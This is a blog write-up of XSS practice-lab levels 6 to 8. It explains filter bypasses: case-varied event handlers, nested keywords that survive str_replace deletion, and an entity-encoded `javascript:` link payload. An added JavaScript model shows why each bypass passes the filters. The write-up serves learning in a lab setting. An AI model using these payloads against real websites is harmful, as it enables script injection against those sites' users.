XSS practice record, level 6 to level 10 (part 2)

level 6:

1. First try `"onclick="alert()`, without success (Figure 1). Viewing the page source shows that the `on` of the onclick event has had a character inserted into it, so the PHP logic is probably searching for that keyword and, when it finds it, breaking it up by inserting a character.

2. So try changing the case. The PHP logic is probably only matching the lowercase keyword: to a string search `on`, `oN`, `On` and `ON` are all different, but to the browser `onclick`, `Onclick`, `ONclick` and `oNclick` are the same attribute (HTML attribute names are ASCII case-insensitive), so the handler still executes.

3. Payload: `"oNclick="alert(1)`. Bypassed cleanly; on to the next level.

 

level 7:

1. Same routine: first try `"onclick="alert(1)`. Clicking the input box does nothing. In the source, the key point is that the `on` has been cut out of the onclick string, leaving `click="alert(1)"`.

2. The guess is that the PHP code uses str_replace() to delete the keyword, so use the payload `"ononclick="alert(1)`, which bypassed it. Happily, next level. One caveat worth checking in the source: PHP's str_replace() removes every non-overlapping match in a single pass, so a repeated spelling like `ononclick` loses both `on`s and becomes `click`; a repeated spelling only survives when the filter strips the first occurrence alone. What survives a single-pass deletion is a nested spelling in which removing the match leaves a new one, for example `oonnclick`, which becomes `onclick`.

level 8:

1. This level took a long time; my skills are still lacking. As usual I submitted `"onclick="alert(1)` (Figure 2) and found that the `on` of the event had a character inserted into it and that the `"` had been HTML-entity encoded, so the attribute can no longer be closed. There is also an extra link on the page. Three places below the title display the payload: 1 is the title, 2 is the input box, 3 is the link at the bottom. Checking the source after submitting, only the link (its href value) still carries the input in an injectable position.

2. So construct the payload `javascript:alert(1)`, thinking everything is fine. Just as I was about to boast of being a genius, clicking the link did nothing. The source shows the characters were filtered and the output is `javasc_ript:alert(1)`, which is a real headache. Searching online turns up that a single character can be HTML-entity encoded without affecting how the code runs: the PHP string search only sees the encoded form, while the browser decodes the character reference inside the attribute value before it treats the href as a URL. So encode the `s`.

Encoding method: in a Python environment, run `ord('s')`, which returns 115; put `&#` before it and `;` after. The final payload is `java&#115;cript:alert('sss')`.

3. Click the link and go straight to the next level.
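The following JavaScript is an added example and is not part of the original write-up, nor the lab's own PHP. It reconstructs the three filters from what is observed at levels 6, 7 and 8 above (the exact replacement strings, the case-insensitive single-pass deletion at level 7 and the `&quot;` substitution at level 8 are assumptions) and then applies the two browser-side normalisations the bypasses rely on: attribute names are ASCII-lowercased by the tokenizer, and numeric character references inside an attribute value are decoded before the href is handed to the URL parser. All function names are mine; the payloads are the ones from the write-up plus the nested `oonnclick` spelling for comparison.

```javascript
// Added example, not the lab's PHP: the filters are reconstructed from what the
// write-up observes at each level, the browser side from the HTML/URL rules.

// Level 6 as observed: a character is inserted into "on", case-sensitively
// (modelled on PHP str_replace, which is case-sensitive, so "oN" is not matched).
function level6Filter(input) {
  return input.split("on").join("o_n");
}

// Level 7 as guessed in the write-up: "on" is deleted. Assumptions: the match is
// case-insensitive (the case trick alone is not reported as working), and every
// non-overlapping match is removed in one pass, as PHP str_replace does.
function level7Filter(input) {
  return input.toLowerCase().split("on").join("");
}

// Level 8 as observed: "on" and "script" are broken up and '"' is entity-encoded,
// so the input's value attribute cannot be closed and only the href is usable.
// The exact replacement strings are assumptions.
function level8Filter(input) {
  return input
    .split("script").join("sc_ript")
    .split("on").join("o_n")
    .split('"').join("&quot;");
}

// Browser side 1: the tokenizer ASCII-lowercases attribute names, so oNclick,
// ONclick and onclick all name the same event-handler attribute.
// Payload shape is "<name>="<js>, where the leading quote closes value="...".
function injectedAttributeName(payload) {
  const m = /^"\s*([^\s="]+)\s*=/.exec(payload);
  return m ? m[1].toLowerCase() : null;
}

function isEventHandlerAttribute(name) {
  return name !== null && /^on[a-z]+$/.test(name);
}

// Does the injected attribute survive the filter and still parse as a handler?
function eventHandlerSurvives(filter, payload) {
  return isEventHandlerAttribute(injectedAttributeName(filter(payload)));
}

// Browser side 2: numeric character references inside an attribute value are
// decoded by the tokenizer (decimal &#115; or hex &#x73;; a missing semicolon
// is tolerated), so the URL parser sees the decoded string.
function decodeCharRefs(s) {
  return s.replace(/&#(x[0-9a-f]+|[0-9]+);?/gi, (_, ref) =>
    String.fromCodePoint(
      ref[0].toLowerCase() === "x" ? parseInt(ref.slice(1), 16) : parseInt(ref, 10)
    )
  );
}

// The URL scheme is case-insensitive and leading C0 controls/spaces are ignored.
function hrefRunsJavaScript(rawHref) {
  const url = decodeCharRefs(rawHref).replace(/^[\u0000-\u0020]+/, "");
  return url.toLowerCase().startsWith("javascript:");
}

// The write-up's ord()-based step: replace the character at `index` with its
// decimal character reference so the filter's keyword no longer matches.
function entityEncodeAt(text, index) {
  return text.slice(0, index) + "&#" + text.codePointAt(index) + ";" + text.slice(index + 1);
}

function demo() {
  const results = {
    l6_plain:   eventHandlerSurvives(level6Filter, '"onclick="alert(1)'),   // false
    l6_case:    eventHandlerSurvives(level6Filter, '"oNclick="alert(1)'),   // true
    l7_case:    eventHandlerSurvives(level7Filter, '"oNclick="alert(1)'),   // false: lower-cased first
    l7_doubled: eventHandlerSurvives(level7Filter, '"ononclick="alert(1)'), // false: both "on"s removed
    l7_nested:  eventHandlerSurvives(level7Filter, '"oonnclick="alert(1)'), // true: deletion leaves "on"
    l8_plain:   hrefRunsJavaScript(level8Filter("javascript:alert('sss')")),                     // false
    l8_entity:  hrefRunsJavaScript(level8Filter(entityEncodeAt("javascript:alert('sss')", 4))), // true
  };
  console.table(results);
  return results;
}

demo();
```

The point the table makes is that each filter operates on the raw string before the browser normalises it; a bypass only needs the keyword to be absent at filter time and present after lowercasing or character-reference decoding. The `l7_doubled` row is also the check for the level 7 caveat: under single-pass deletion the repeated spelling collapses, while the nested one survives.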

 

Source: blog.csdn.net/CN_DS/article/details/103302789